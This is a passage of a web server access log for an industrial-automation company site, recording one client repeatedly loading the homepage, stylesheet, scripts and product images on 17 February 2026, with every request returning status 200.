10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:48:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:48:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:48:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:48:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:48:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:50:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10404] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:50:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:50:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:50:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:50:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:50:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:50:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:50:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20908] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:50:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:50:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:50:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:50:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:50:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:50:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:57:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10404] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:57:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:57:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:57:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:57:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:57:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:57:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:57:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20934] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:57:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:57:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:57:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:57:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:57:08 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:57:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:58:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10404] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:58:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:58:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:58:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:58:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:58:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:58:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:58:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20927] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:58:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:58:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:58:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:58:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:58:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:58:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:59:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10404] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:59:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:59:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:59:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:59:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:59:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:59:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:59:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20927] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:59:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:59:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:59:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:59:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:59:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:59:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:03:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10401] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:03:03:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:03:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:03:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:03:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:03:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:03:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:03:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20927] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:03:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:03:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:03:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:03:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:03:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:03:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:03:04:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10399] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:03:04:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" 